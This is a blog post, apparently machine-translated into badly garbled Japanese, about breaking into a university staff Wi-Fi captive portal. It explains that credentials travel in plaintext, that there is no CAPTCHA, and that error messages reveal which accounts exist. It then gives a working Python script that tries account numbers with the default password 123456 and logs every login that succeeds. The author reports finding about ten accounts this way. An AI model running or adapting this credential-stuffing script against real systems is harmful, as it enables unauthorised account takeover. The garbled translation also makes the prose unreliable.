ネットオフ23時00分ベッドルームには、学校の生徒になって、無線通信会社が同意しなかっhznu。。夜のホットスポットでのみ開きます。。この場合、キャンパス無線ネットワークhznu-教師のセキュリティがかかっています
それはそれは、セキュリティテストになります
でもhznu教師ワイヤレスノートブック以下のように、ページがポップアップ表示されます:アカウントのパスワードを入力するように求め
レビューページでは:F12キーを押してアカウントのパスワードを記入し、[ログイン]をクリックします:
HTTPデータは、あなたが見ることができるアイテムになりますフォームデータのヘッダなどのHTTPボディは平文で送信されます
などXXXXアカウントのパスワード123456、その他のヒントは、間違ったアカウントのパスワードで見つけることができます
ここで、次はこの脆弱性を確認するために自分の考えを整理するには:
チューリングテストコードの識別コードの調製は、攻撃者の99%を落胆させることができるので、最初、何のコードが存在しない、単に欠陥は、致命的です
第二に、これらのパスワードが平文で送信され、そこには確かなリスクになりますが、また、推定パケットキャプチャツールは、内部の情報をキャッチすることができます
その後、アカウントのパスワードが邪魔に送られたポストを使用して見て、その内容を返すことができます。
私たちは、アカウントのパスワードが返されているものに応じて正しくない判断することができます。
外プロンプト「アカウントのパスワードエラー」を返すことに加えて、
アカウントが存在しない場合は記入実際には、またように「このアカウントがなければ、」プロンプト見つけることができます
私はjupyterノートテストパスとステップバイステップの前に実際には、requests.postの取得要求を送信します
ページの出力情報は次のとおりです。
そのアカウントが存在しない同じ、その後、LAN認証プラス速く、私は横断の数を減少させることを、いくつかの元スタッフアカウントを、知っています、
python3.6:まあ、バーコードを置きます
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import requests
import os
s = requests.session()
#print(s.headers)
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Host': '172.31.1.5',
'Referer': 'http://172.31.1.5/srun_portal_pc.php?wlanuserip=172.18.69.34&wlanacname=&wlanuserfirsturl=http://www.hao123.com/&ac_id=6',
'X-Requested-With':'XMLHttpRequest'
}
login_url='http://172.31.1.5/srun_portal_pc.php?wlanuserip=172.18.69.34&wlanacname=&wlanuserfirsturl=http://www.hao123.com/&ac_id=6'
data = {'action':'login',
'username':'20021064',
'password':'123456',
'ac_id':'6',
'user_id':'6',
'user_ip':'172.18.69.34',
'nas_ip':'',
'user_mac':'',
'save_me':'1',
'ajac':'1'}
#create a new file to store account
dest = "/home/xxxx/Desktop/blowup.txt"
if os.path.exists(dest) is None:
os.mkdirs(dest)
f = open(dest,'w')
f.close() #without this segment,the file won't be created
with open(dest,'a') as fw:
fw.write("acount which password is 123456:\n")
for i in range(xxx,xxx): #这里填遍历的 账号范围
data['username']='2002'+str(i)
response = s.post(login_url,data=data,headers=headers)
result = response.text
print('account:'+str(i)+":")
error_msg = "用户名或密码错误,请重试。"
user_not_exist = "用户不存在"
if error_msg in response.text:
print(error_msg)
elif user_not_exist in response.text:
print(user_not_exist)
else:
print("acount: 2002"+str(i))
fw.write("acount: 2002"+str(i)+"\n")
不純な動機でこのコードを人々の乱用を防ぐために、私は範囲を横断xxxになり、人々は自然に口座に数字を記入する方法を知って、パスワードの接頭辞は2002です
次のようにまあ、結果は
これ。。私は実際にグループの何百もの上でテストされ、いくつかの怠惰10は、初期パスワード、Taibuyinggaiを変更していないがあり、
最後に、この脆弱性の発見と共有は、単に知識の普及のために、私たちは、教員の無線ネットワークリソースを取ることはありません、祝福